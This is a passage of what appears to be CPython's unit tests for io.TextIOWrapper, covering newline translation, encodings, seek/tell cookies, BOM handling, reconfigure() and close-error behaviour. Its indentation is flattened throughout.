self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
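        # Exercise a matrix of chunk sizes and encodings: write, reopen, then
        # check read(), seek()/tell() cookies, and appending at end of file.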
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
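        # Build a line whose multibyte suffix straddles the decoder's chunk
        # boundary (the prefix is chunk_size - 2 ASCII bytes), then read across it.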
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
        # Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(support.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(support.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
            # Check that the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
    # Read in amounts equal to TextIOWrapper._CHUNK_SIZE, which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
        # Test that the text file is closed despite the failed flush,
        # and that flush() is called before the file is closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __del__(self):
io.TextIOWrapper(io.BytesIO(), **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
        # TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "LookupError: unknown encoding: ascii"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
def test_internal_buffer_size(self):
# bpo-43260: TextIOWrapper's internal buffer should not store
# data larger than chunk size.
chunk_size = 8192 # default chunk size, updated later
class MockIO(self.MockRawIO):
def write(self, data):
if len(data) > chunk_size:
raise RuntimeError
return super().write(data)
buf = MockIO()
t = self.TextIOWrapper(buf, encoding="ascii")
chunk_size = t._CHUNK_SIZE
t.write("abc")
t.write("def")
        # The default chunk size is 8192 bytes, so t doesn't write data to buf yet.
self.assertEqual([], buf._write_stack)
with self.assertRaises(RuntimeError):
